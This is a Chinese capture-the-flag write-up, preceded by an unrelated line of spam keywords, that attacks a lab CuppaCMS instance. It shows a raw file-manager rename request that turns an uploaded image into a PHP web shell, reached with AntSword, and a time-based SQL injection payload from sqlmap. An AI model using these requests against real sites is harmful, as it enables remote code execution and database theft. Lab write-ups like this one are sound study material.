资溪做面包招聘的网站,代运营公司哪个地方好,wordpress 4.8 中文,提高简介
CuppaCMS是一套内容管理系统#xff08;CMS#xff09;。 CuppaCMS 2019-11-12之前版本存在安全漏洞#xff0c;攻击者可利用该漏洞在图像扩展内上传恶意文件#xff0c;通过使用文件管理器提供的重命名函数的自定义请求#xff0c;可以将图像扩展修改为PHP#xf…简介
CuppaCMS是一套内容管理系统CMS。 CuppaCMS 2019-11-12之前版本存在安全漏洞攻击者可利用该漏洞在图像扩展内上传恶意文件通过使用文件管理器提供的重命名函数的自定义请求可以将图像扩展修改为PHP从而导致远程任意代码执行。
在/components/table_manager/路径下存在sql注入
过程
打开靶场
弱口令admin/admin 登录后台
找到文件上传位置只允许上传图片 上传之后修改文件后缀为php进行抓包 抓包数据如下
POST /js/filemanager/api/index.php HTTP/1.1
Host: eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Referer: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com/js/filemanager/index.php
Content-Type: application/json
Content-Length: 59
Origin: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d959431718849866,1718896116,1719242501,1719395363; chkphoneacWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session688e0a110412c17b0a7e0a5ad4cdf894cf99798b; Hm_lpvt_2d0601bd28de7d49818249cf35d959431719395439; countryus; languageen; PHPSESSID0rvs895vqjskasibtukhf8m0a2; administrator_pathhttp%3A%2F%2Feci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com%2F; administrator_document_path%2F
Priority: u1{from://asd.php.png,to://asd.php,action:rename}
修改成功之后放包修改成功要删掉.htaccess文件然后使用蚁剑连接 得到flag{047b0831-949e-41f3-84f1-49859eb6bebf}
附加
在测试的过程中发现还存在一个sql注入漏洞
找到Permissions-Group在搜索处搜索并进行抓包 抓包数据如下
POST /components/table_manager/ HTTP/1.1
Host: eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charsetUTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 150
Origin: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com/
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d959431718849866,1718896116,1719242501,1719395363; chkphoneacWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session688e0a110412c17b0a7e0a5ad4cdf894cf99798b; Hm_lpvt_2d0601bd28de7d49818249cf35d959431719395439; countryus; languageen; PHPSESSID0rvs895vqjskasibtukhf8m0a2; administrator_pathhttp%3A%2F%2Feci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com%2F; administrator_document_path%2F
Priority: u1search_word123filter_languageorder_byidorder_orientationASCpathcomponent%2Ftable_manager%2Fview%2Fcu_menusuniqueClasswrapper_content_897880 丢到sqlmap中运行
得到payload
search_word123filter_language AND (SELECT 5543 FROM (SELECT(SLEEP(5)))JJri) AND XiZLXiZLorder_byidorder_orientationASCpathcomponent/table_manager/view/cu_menusuniqueClasswrapper_content_897880
爆出数据库如下 爆表 并没有发现flag就没有继续测试。
